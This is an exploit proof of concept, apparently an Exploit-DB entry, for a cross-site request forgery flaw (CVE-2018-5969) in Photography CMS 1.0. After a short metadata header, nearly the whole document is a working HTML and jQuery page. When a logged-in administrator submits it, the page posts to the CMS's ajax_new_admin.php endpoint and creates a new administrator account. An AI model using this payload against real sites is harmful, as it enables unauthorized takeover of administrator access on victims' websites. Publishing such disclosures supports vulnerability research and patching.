<!--
# # # # #
# Exploit Title: Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin)
# Dork: N/A
# Date: 23.01.2018
# Vendor Homepage: http://ronnieswietek.com/
# Software Link: https://codecanyon.net/item/client-photo-studio-photography-cms/1191688
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5969
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
#
# Proof of Concept:
# 1)
-->
<html>
<body>
<script src="http://code.jquery.com/jquery-1.7.1.min.js"></script>
<h2>New Admin</h2>
<div class="efe">
<form method="post" onSubmit="return false">
<label for="username">Username:</label>
<input id="username" type="text"><br><br>
<label for="password1">Password:</label>
<input id="password1" type="password"><br><br>
<label for="password2">Confirm Password:</label>
<input id="password2" type="password"><br><br>
<label for="email">Email:</label>
<input id="email" type="text"><br><br>
<input id="ekleabi" value="Ver Ayari" type="submit">
</form>
</div>
<script type="text/javascript">
$("#ekleabi").live('click',function()
{
$.ajax({
type: "POST",
url: "http://ronnieswietek.com/cc/clients/resources/ajax/ajax_new_admin.php",
data:{
username:$(".efe #username").val(),
password1:$(".efe #password1").val(),
password2:$(".efe #password2").val(),
email:$(".efe #email").val()
}
});
});
</script>
</body>
</html>